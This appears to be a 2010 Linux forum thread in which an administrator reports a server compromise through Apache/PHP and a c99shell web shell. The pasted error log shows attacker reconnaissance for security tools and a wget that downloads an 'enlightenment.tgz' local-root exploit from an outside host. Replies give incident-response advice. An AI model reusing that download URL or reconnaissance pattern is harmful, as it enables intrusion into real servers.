| View previous topic :: View next topic |
| Author |
Message |
linumik
Tux's lil' helper
Joined: 31 May 2005
Posts: 102
|
 Posted: Mon Jul 19, 2010 1:43 am Post subject: Got hacked through Apache with Enlightenment exploit |
 |
|
http://securityreason.com/exploitalert/7189
Is there a fix for this? How do I prevent that from happening again? I can't find any information and there was no security alert (I have emerge sending me notifications when there is a problem).
Anyway, I Found this it the main log file which is usually empty as I have per site logs.
| Code: |
error: permission denied on key 'kernel.cap-bound'
error: permission denied on key 'kernel.cad_pid'
error: permission denied on key 'net.ipv4.route.flush'
error: permission denied on key 'net.ipv6.route.flush'
error: permission denied on key 'fs.binfmt_misc.register'
cat: /etc/issue.net: No such file or directory
cat: /etc/*-realise: No such file or directory
which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
error: "kern.ostype" is an unknown key
which: no lcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ruby in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no bzip in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no suidperl in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no kav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no nod32 in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no bdcored in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no uvscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no drwebd in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no rkhunter in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no chkrootkit in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ipfw in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no tripwire in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no shieldcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no portsentry in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no snort in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ossec in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no lidsadm in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no tcplodg in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sxid in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no logcheck in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no logwatch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sysmask in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no zmbscap in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sawmill in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no wormscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ninja in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no get in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
--2010-07-18 06:08:20-- http://th3-0utl4ws.com/localroot/xploits/enlightenment.tgz
Resolving th3-0utl4ws.com... 178.21.112.247
Connecting to th3-0utl4ws.com|178.21.112.247|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 98102 (96K) [application/x-tar]
Saving to: `enlightenment.tgz'
0K .......... .......... .......... .......... .......... 52% 162K 0s
50K .......... .......... .......... .......... ..... 100% 423K=0.4s
2010-07-18 06:08:21 (230 KB/s) - `enlightenment.tgz' saved [98102/98102]
[Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, shutting down
[Sun Jul 18 08:21:01 2010] [notice] Apache configured -- resuming normal operations
[Sun Jul 18 08:21:54 2010] [notice] caught SIGTERM, shutting down
[Sun Jul 18 20:42:46 2010] [notice] Apache configured -- resuming normal operations
|
And all I could find in the running processed was:
| Code: |
root 23600 1 0 06:09 ? 00:00:00 /bin/sh -i
userSite122 23618 23600 0 06:09 ? 00:00:01 [exploit] <defunct>
root 27312 23600 0 10:18 ? 00:00:00 ping www.maritime.edu
|
This doesn't look good at all. What's the best way to check the system for trojans? Or should I just reinstall it?  |
|
| Back to top |
|
 |
ppurka
Advocate
Joined: 26 Dec 2004
Posts: 3256
|
| Posted: Mon Jul 19, 2010 2:29 am Post subject: |
|
|
You should at least install rkhunter and chkrootkit and run them. In the long term, try to reinstall from scratch.
_________________
emerge --quiet redefined | E17 vids: I, II | Now using kde5 | e is unstable :-/ |
|
| Back to top |
|
|
Hu
Administrator
Joined: 06 Mar 2007
Posts: 23584
|
| Posted: Mon Jul 19, 2010 4:22 am Post subject: |
|
|
| The main payload may have been delivered in enlightenment.tgz, but some other problem allowed the attacker to execute enough code to download and use that payload. You need to find how the first attack got onto the system. It is the one that spammed your logs probing for various files and processes. |
|
| Back to top |
|
|
linumik
Tux's lil' helper
Joined: 31 May 2005
Posts: 102
|
| Posted: Mon Jul 19, 2010 4:56 am Post subject: |
|
|
| Hu wrote: | | You need to find how the first attack got onto the system. |
I can't find anything in any other logs. The only traces of the attack are in apache-error.log that I posted. That's why I think it is some problem with apache or maybe php. But I can't find anything unusual in any other logs including apache logs for individual sites. I use per-user apache mod that might have an issue, too, but I can't find enough information to say for sure.
rkhunter didn't find any rootkits, but I guess, I still better off reinstalling the system. I just want to figure out what I need to close first, so I don't have to go through it again. |
|
| Back to top |
|
|
Anarcho
Advocate
Joined: 06 Jun 2004
Posts: 2970
Location: Germany
|
| Posted: Mon Jul 19, 2010 2:15 pm Post subject: |
|
|
My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log.
_________________
...it's only Rock'n'Roll, but I like it! |
|
| Back to top |
|
|
linumik
Tux's lil' helper
Joined: 31 May 2005
Posts: 102
|
| Posted: Tue Jul 20, 2010 7:10 pm Post subject: |
|
|
| Anarcho wrote: | | My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log. |
I found a script in one of the directories that is basically c99shell php script that was used to gain access. I am trying to figure out how that script got there... The script doesn't work if safe_mode is on... which wasn't. But with safe_mode many other scripts don't work either.
Anyway, about that enlightenment hack. Does anyone know if it is fixed in the latest kernel? |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
Networking & Security
